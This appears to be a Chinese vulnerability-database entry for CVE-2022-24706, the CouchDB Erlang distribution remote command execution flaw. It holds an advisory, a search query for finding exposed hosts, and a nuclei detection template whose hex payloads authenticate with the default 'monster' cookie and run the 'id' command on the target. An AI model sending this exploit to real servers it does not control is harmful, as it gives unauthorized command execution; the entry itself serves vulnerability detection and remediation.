漏洞信息
漏洞名称: CouchDB Erlang Distribution - Remote Command Execution
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个面向文档的数据库,使用JSON格式存储数据,并通过HTTP API进行访问。CouchDB广泛应用于各种规模的企业和个人项目中,因其易于使用和强大的同步功能而受到欢迎。
该漏洞存在于Apache CouchDB的Erlang分布式协议中,由于默认安装时未正确配置安全设置,攻击者无需认证即可访问系统并获得管理员权限。漏洞的技术根源在于默认的Erlang cookie值“monster”被使用,这使得攻击者能够绕过认证机制,执行任意命令。
此漏洞的影响极为严重,攻击者可以利用此漏洞在受影响的系统上执行任意命令,可能导致数据泄露、服务中断或进一步的系统入侵。由于漏洞允许未经授权的访问,且可以自动化利用,因此对运行受影响版本CouchDB的系统构成了重大威胁。建议用户立即升级到3.2.2或更高版本,以避免潜在的安全风险。
产品厂商: apache
产品名称: couchdb
影响版本: * < 3.2.2
搜索语法: product:”CouchDB” OR product:”couchdb” OR cpe:”cpe:2.3:a:apache:couchdb”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2022%2FCVE-2022-24706.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
id: CVE-2022-24706
info:
name: CouchDB Erlang Distribution - Remote Command Execution
author: Mzack9999,pussycat0x, NaN@korelogic
severity: critical
description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
reference:
- https://www.exploit-db.com/exploits/50914
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
- http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24706
cwe-id: CWE-1188
epss-score: 0.94412
epss-percentile: 0.99975
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: apache
product: couchdb
shodan-query:
- product:"CouchDB"
- product:"couchdb"
- cpe:"cpe:2.3:a:apache:couchdb"
tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
variables:
name_msg: "00156e00050007499c4141414141414041414141414141"
challenge_reply: "00157201020304"
cookie: "monster"
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:{{Port}}"
inputs:
- data: "{{name_msg}}"
type: hex
read: 1024
- read: 1024
name: challenge
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type: hex
- data: "{{cmd}}"
type: hex
read: 1024
matchers:
- type: word
part: raw
words:
- "uid"
- "gid"
- "groups"
condition: and
|